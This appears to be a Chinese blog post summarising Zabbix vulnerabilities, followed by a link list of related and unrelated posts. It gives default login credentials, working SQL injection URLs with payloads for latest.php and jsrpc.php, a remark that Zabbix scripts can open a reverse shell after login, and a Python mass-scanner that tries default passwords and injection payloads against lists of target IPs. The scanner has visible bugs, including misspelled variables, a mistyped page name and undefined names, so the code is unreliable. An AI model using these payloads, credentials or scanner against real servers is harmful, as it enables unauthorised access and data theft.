Zabbix漏洞汇总
一、zabbix:
zabbix是监控是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案。zabbix能监视各种网络参数,保证服务器系统的安全运营;并提供灵活的通知机制以让系统管理员快速定位/解决存在的各种问题。
二、Zabbix漏洞:
1、弱口令:
WeapPassword = [("admin","zabbix"),("Admin","zabbix"),("guest","")]
2、SQL注入
(1)
标题:latest.php处toogle_ids[]参数SQL注入
攻击条件:登陆后
危害:可获取系统权限
URL以及payload:
"""
http://a.b.c.d/latest.php?output=ajax&sid=登录后的sessionid的后16位&favobj=toggle&toggle_open_state=1&toggle_ids[]=15385); select * from users where (1=1
"""
(2)
标题:jsrpc.php处profileIdx2参数SQL注入
攻击条件:无需登录,亦可以登录后使用高权限的sid、cookie进行替换
危害:一般SQL注入危害
URL以及payload:
"""
http://a.b.c.d/jsrpc.php?sid=0bcd4ade648214dc&type=9&method=screen.get×tamp=1471403798083&mode=2&screenid=&groupid=&hostid=0&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&screenitemid=&period=3600&stime=20160817050632&resourcetype=17&itemids%5B23297%5D=23297&action=showlatest&filter=&filter_task=&mark_color=1
"""
(3)
标题:其他SQL注入漏洞:chart_bar.php处itemid参数和periods参数SQL注入;httpmon.php处applications参数SQL注入
攻击条件:不详
危害:不详
URL以及payload:一般SQL注入payload尝试
3、OS命令注入执行:
(1)弱口令登录后,使用zabbix自带的Script执行系统命令可以反弹shell等等
(2)防御:
#不要设置AllowRoot=1,避免agent和server以root权限启动。
#进制agent执行system.run,不要设置EnableRemoteCommands=1。
#即使打补丁。
4、自己写的一个python检查脚本:有问题及时喷我
#!/usr/bin/env python
# -*- coding:utf-8 -*-
"""
This Python Script Is For "Zabbix" VulnScan!
Author:ChenRan
Company:360.net
""" # import lib files
import os
import sys
import time
import logging
import datetime
import requests
import threading
from bs4 import BeautifulSoup
from optparse import OptionParser #global varites define
ZabbixTarget = None#target ip address!
ZabbixFile = None#target ip address file
BlackList = [
'incorrect',
'<!-- Login Form -->'
] #global config set
logging.basicConfig(level=logging.INFO,format='%(message)s') #global function defines:
def Config_Init():
"""
Take "http://" to the ip address to create targeturl!
"""
global ZabbixTarget
global ZabbixFile
if ZabbixTarget != None:
target = "http://%s"%ZabbixTarget
return [target]
elif ZabbixFile != None:
targetlist = []
with open(ZabbixFile,"r") as fr:
for ip in fr.readlines():
ip = ip.split("\n")[0].split("\r")[0]
target = "http://%s"%str(ip)
targetlist.append(target)
return targetlist
else:
return [] def get_post_data(page_content):
"""
from response html get post data!
"""
postdata = {}
soup = BeautifulSoup(page_content, "html.parser")
for inputparameter in soup.find_all('input'):
if 'value' in inputparameter.attrs and 'name' in inputparameter.attrs:
postdata[inputparameter['name']] = inputparameter['value']
return postdata def report_file_allinone():
vulnlist = []
scantime = str(datetime.datetime.now())
for parents,dirs,filenames in os.walk("./"):
for filename in filenames:
if filename.find("zabbix_vulnscan_result") >= 0:
with open(filename,"r") as fr:
vulnlist.extend(fr.readlines())
os.remove(filename)
with open("zabbix_vuln_report_%s.csv"%str(datetime.date.today()),"w") as fw:
fw.write("vuln-IP,Vuln-Type,Scan-Time\n")
for line in vulnlist:
fw.write(line) #Zabbix Scan Class Defines
class ZabbixScan:
def __init__(self,targetlist):
"""
#class column init!
VulnExpPHPFile:
//0-login-weakpassword
//1-httpmon.php parameter->applicationos
//2-chart_bar.php parameter->itemid
//3-jsrpc.php parameter->profileIdx2
//4-latest.php parameter->toggle_ids[]
//5-OS_Injection->When you login the system you can run you scripts!
TestTarget:
//0-login-weakpassword
//1-jsrpc.php
//2-latest.php
"""
self._weakpassword = [{"username":"Admin","password":"zabbix"},{"username":"admin","password":"zabbix"},{"username":"guest","password":""}] #default password directionary!
self._targetlist = targetlist #wait for scan target!
self._size = len(self._targetlist)#size of scan target!
self._sqlinjectionurl1_vulnlist = []
self._sqlinjectionurl2_vulnlist = []
self._login_weakpassword_vulnlist = []
self._login_weakpassword_safelist = [] def __del__(self):
del self._weakpassword
del self._targetlist
del self._size
del self._sqlinjectionurl1_vulnlist
del self._sqlinjectionurl2_vulnlist
del self._login_weakpassword_vulnlist
del self._login_weakpassword_safelist def __len__(self):
"""return size of targetlist"""
return self._size def _scan_default_password_login(self):
for authinfo in self._weakpassword:
user = authinfo["username"]
pswd = authinfo["password"]
for target in self._targetlist:
logging.info("[*] Target:%s Payload:%s"%(str(target),str(authinfo)))
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
}
request = requests.session()
try:
response = request.get(target,headers=headers,timeout=3)
except Exception,ex:
self._login_weakpassword_safelist.append(target)
continue
if response.status_code != 200:
self._login_weakpassword_safelist.append(target)
continue
postdata = get_post_data(response.content)
headers["Referer"]=target
postdata["user"] = user
postdata["password"] = pswd
try:
response = request.post(target+"/index.php",headers=headers,data=postdata,timeout=3)
except Exception,ex:
self._login_weakpassword_safelist.append(target)
continue
if "chkbxRange.init();" in response.content:
for flagstring in BlackList:
if flagstring in response.content:
self._login_weakpassword_safelist.append(target)
self._login_weakpassword_vulnlist.append((target,user,pswd))
else:
self._login_weakpassword_safelist.append(target)
request.close() def _sqlinjectionurl1_scan(self):
logging.info("[*] latest.php sqlinjection scan!")
for vulntarget in self._login_weakpassword_vulnlist:
target = vulntarget[0]
user = vulntarget[1]
pswd = vulntarget[2]
request = requests.session()
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
}
try:
response = request.get(target,headers=headers,timeout=3)
except Exception,ex:
continue
postdata = get_post_data(response.content)
postdata["user"] = user
postdata["password"] = pswd
headers["Referer"]=target
try:
response = request.post(target+"/infex.php",headers=headers,data=postdata,timeout=3)
except Exception,ex:
continue
sessionid = response.cookie.values()[0][-16:]
scanurl = target +"/latest.php?output=ajax&sid=%s&favobj=toggle&toggle_open_state=1&toggle_ids[]=1%^&*%22%27()-*#"%str(sessionid)
try:
response = request.get(scanurl,timeout=20)
except Exception,ex:
continue
if "SQL syntax" in repsonse:
self._sqlinjectionurl1_vulnlist.append(vulntarget)
else:
request.close() def _sqlinjectionurl2_scan(self):
logging.info("[*] jsrpc.php sqlinjection scan!")
for vulntarget in self._targetlist:
scanurl = vulntarget + "/jsrpc.php?type=9&method=screen.get×tamp=1471403798083&pageFile=history.php&profileIdx=web.item.graph&profileIdx2=1+or+updatexml(1,md5(0x11),1)+or+1=1)%23&updateProfile=true&period=3600&stime=20160817050632&resourcetype=17"
headers = {
'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0',
}
try:
response = request.get(url,headers=headers,timeout=20)
except Exception,ex:
continue
if "ed733b8d10be255eceba344d533586" in response.content:
self._sqlinjectionurl2_vulnlist.append(vulntarget)
else:
pass def scan_run(self):
self._scan_default_password_login()
self._sqlinjectionurl1_scan()
self._sqlinjectionurl2_scan() class scanthread(threading.Thread):
def __init__(self,threadname,targetlist):
threading.Thread.__init__(self,name=threadname)
self.scanner = ZabbixScan(targetlist)
self.name = threadname
self.targetlist = targetlist
def _create_csv(self):
scantime = str(datetime.datetime.now())
with open("zabbix_vulnscan_result_%s_%s"%(str(time.time()),str(self.name)),"w") as fw:
for vuln in self.scanner._login_weakpassword_vulnlist:
target = vuln[0].split("http://")[-1]
vulntype = "weakpassword"
vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
fw.write(vulnstring)
for vuln in self.scanner._sqlinjectionurl1_vulnlist:
target = vuln[0].split("http://")[-1]
vulntype = "latest.php-SQLI"
vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
fw.write(vulnstring)
for vuln in self.scanner._sqlinjectionurl1_vulnlist:
target = target.split("http://")[-1]
vulntype = "jsrpc.php-SQLI"
vulnstring = "%s,%s,%s\n"%(str(target),vulntype,scantime)
fw.write(vulnstring)
def run(self):
#logging.info("[*] %s running!"%self.name)
#logging.info("[*] %s MyTarget:%s"%(str(self.name),str(self.targetlist)))
self.scanner.scan_run()
self._create_csv()
#logging.info("[*] %s finished!"%self.name) if __name__ == "__main__":
logging.info("[+]*****************************************************************[+]")
logging.info("Zabbix Scan Init!")
parser = OptionParser()
parser.add_option("-i","--iptarget",dest="iptarget",help="Target IP address!")
parser.add_option("-f","--iptargetfile",dest="iptargetfile",help="Target IPs file!")
parser.add_option("-t","--threadnum",dest="threadnum",help="Number of Added Threads to Scan!")
(options, args) = parser.parse_args()
parameterchecklist = [options.iptarget,options.iptargetfile]
if parameterchecklist in [[None,None],[None,""],["",None],["",""]]:
logging.error("[-] Target parameters error!")
exit(0)
try:
options.threadnum = 1 if options.threadnum == None or options.threadnum == "" else int(options.threadnum)
except Exception,ex:
logging.error("[-] Threadnum parameter error!")
exit(0)
[ZabbixTarget,ZabbixFile] = parameterchecklist
logging.info("[+] Scan Config Init!")
targetlist = Config_Init()
targetsize = len(targetlist)
logging.info("[+] Scan Target Number:%s"%str(targetsize))
logging.info("[+] Scan Threads Init")
threadtargetsize = targetsize/options.threadnum
devidestart = 0
devideend = threadtargetsize
threadlist = []
nameflag = 0
while True:
threadname = "scan-thread-%s"%str(nameflag)
nameflag += 1
if devideend < targetsize:
threadtargetlist = targetlist[devidestart:devideend]
threadlist.append(scanthread(threadname,threadtargetlist))
devidestart += threadtargetsize
devideend += threadtargetsize
elif devidestart <= targetsize:
threadtargetlist = targetlist[devidestart:]
threadlist.append(scanthread(threadname,threadtargetlist))
devidestart += threadtargetsize
devideend += threadtargetsize
else:
break logging.info("[+] Scan Thread Start!")
for thread in threadlist:
thread.start()
time.sleep(2)
logging.info("[+] %s --Start!"%thread.name)
for thread in threadlist:
thread.join()
logging.info("[+] Scan Finished!")
logging.info("[+] Report Creating!")
report_file_allinone()
logging.info("[+] Report Create!")
exit(0)
Zabbix漏洞汇总的更多相关文章
- Zabbix 漏洞分析
之前看到Zabbix 出现SQL注入漏洞,自己来尝试分析. PS:我没找到3.0.3版本的 Zabbix ,暂用的是zabbix 2.2.0版本,如果有问题,请大牛指点. 0x00 Zabbix简介 ...
- Apache Shiro 漏洞汇总
Apache Shiro 漏洞汇总 以下是我个人通过收集信息收集起来的一些Apache Shiro漏洞信息,这些漏洞的poc都是公开的,利用起来也是比较简单 Apache Shiro是什么东西: Ap ...
- zabbix漏洞
1:Zabbix配置不当安全事件 ①案例事件 sohu的zabbix,可导致内网渗透 http://wy.zone.ci/bug_detail.php?wybug_id=wooyun-2015-0 ...
- Zabbix漏洞学习
Zabbix介绍 zabbix([`zæbiks])是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案. zabbix能监视各种网络参数,保证服务器系统的安全运营:并提供灵 ...
- Zabbix漏洞利用 CVE-2016-10134
最近也是遇见了Zabbix,所以这里以CVE-2016-10134为例复现一下该漏洞 什么是Zabbix? zabbix是一个基于WEB界面的提供分布式系统监视以及网络监视功能的企业级的开源解决方案. ...
- zabbix 问题汇总
1.Zabbix agent on Zabbix server is unreachable for 5 minutes 查看日志sudo tailf /var/log/zabbix/zabbix_a ...
- 常见Java库漏洞汇总
1.ActiveMQ 反序列化漏洞(CVE-2015-5254) ref:https://www.nanoxika.com/?p=408 Apache ActiveMQ是美国阿帕奇(Apache)软件 ...
- struts2远程代码执行漏洞汇总整理
一.S2-001 1.漏洞原理 在默认配置下,如果用户所提交的表单出现验证错误,后端会对用户的输入进行解析处理,然后返回并显示处理结果. 举个例子,当你提交的登录表单为username=xishir& ...
- android CVE 漏洞汇总
arm exploits 技术教程: Learning Pentesting for Android Devices CVE-2015-1530 ,CVE-2015-1474 两个android整数溢 ...
随机推荐
- 我们要注意的Mysql基本安全设置
1.设置或修改Mysql root密码:默认安装后空密码,以mysqladmin命令设置密码: mysqladmin -uroot password "password" Mysq ...
- ASP.NET实现类似Excel的数据透视表
代码: /Files/zhuqil/Pivot.zip 数据透视表提供的数据三维视图效果,在Microsoft Excel能创建数据透视表,但是,它并不会总是很方便使用Excel.您可能希望在Web应 ...
- 10分钟学会写Jquery插件
最近很多网友说jquery插件是什么啊?怎么写的啊?我不会写啊? 一大堆的问题一时都不知道怎么回答他们,个人认为是网友们把问题复杂化了. 其实就是把一些常用.实用.通用的功能封装起来而以,简单的来 ...
- e664. 在图像中获取子图像
// From an Image image = createImage(new FilteredImageSource(image.getSource(), new CropImageFilter( ...
- C++ 基本的输入输出
C++ 基本的输入输出C++ 标准库提供了一组丰富的输入/输出功能,我们将在后续的章节进行介绍.本章将讨论 C++ 编程中最基本和最常见的 I/O 操作. C++ 的 I/O 发生在流中,流是字节序列 ...
- vncserver的安装和使用 2
环境:RedHat Linux 6企业版.Xwindows:gnome (红帽默认安装的图形界面) 尽管我们可以使用SSH连接远程通过字符界面来操作Linux,但是对于更多熟悉图形人来说是很不方便的, ...
- 终于AC了“最短路径”
今天做了一道关于最短路径的算法题,虽然最后AC了,但是我写的第一个算法,我认为是没有问题的,自己编写的测试用例也全部通过,反复调试了,都没有错误.可是在OJ上一提交就提示Wrong Answer,真是 ...
- PHP 获取图像信息 getimagesize函数
getimagesize() 函数用于获取图像大小及相关信息,成功返回一个数组,失败则返回 FALSE 并产生一条 E_WARNING 级的错误信息. 语法:array getimagesize(s ...
- 深入new/delete:Operator new的全局重载
Operator new 的全局重载 原文地址:http://blog.csdn.net/zhenjing/article/details/4354880 我们经常看到这么一句话: operator ...
- [转]anchorPoint 锚点解析
转自:http://blog.csdn.net/cjopengler/article/details/7045638 anchor point 究竟是怎么回事? 之所以造成不容易理解的是因为我们平时看 ...